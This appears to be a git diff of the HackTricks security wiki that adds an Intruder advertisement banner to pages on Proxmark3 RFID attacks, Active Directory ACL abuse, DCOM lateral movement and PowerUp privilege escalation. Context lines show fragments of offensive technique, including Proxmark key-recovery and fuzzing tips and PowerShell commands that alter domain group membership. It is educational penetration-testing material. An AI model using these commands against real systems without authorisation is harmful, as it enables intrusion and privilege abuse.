+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Attacking RFID Systems with Proxmark3 The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). @@ -71,6 +79,13 @@ proxmark3> script run mfkeys You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration. +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index 6f81384a6..9495a665d 100644 --- a/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Context This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs. @@ -267,6 +275,14 @@ Get-DomainGroupMember -Identity "Group Name" | Select MemberName Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## WriteDACL + WriteOwner If you are the owner of a group, like I'm the owner of a `Test` AD group: @@ -518,6 +534,13 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist * [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) * [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md index 80d3c115a..d9faef94b 100644 --- a/windows-hardening/lateral-movement/dcom-exec.md +++ b/windows-hardening/lateral-movement/dcom-exec.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## MMC20.Application **DCOM** (Distributed Component Object Model) objects are **interesting** due to the ability to **interact** with the objects **over the network**. Microsoft has some good documentation on DCOM [here](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and on COM [here](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx). You can find a solid list of DCOM applications using PowerShell, by running `Get-CimInstance Win32_DCOMApplication`. @@ -154,6 +162,13 @@ The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Emp * The first method was copied from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/), for more info follow the link * The second section was copied from [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/), for more info follow the link +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/windows-local-privilege-escalation/powerup.md b/windows-hardening/windows-local-privilege-escalation/powerup.md index ec60dce60..fa5375fa8 100644 --- a/windows-hardening/windows-local-privilege-escalation/powerup.md +++ b/windows-hardening/windows-local-privilege-escalation/powerup.md @@ -16,6 +16,13 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** # Invoke @@ -45,6 +52,11 @@ _03/2019_ * [x] Cached Group Policy Preferences .xml files +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}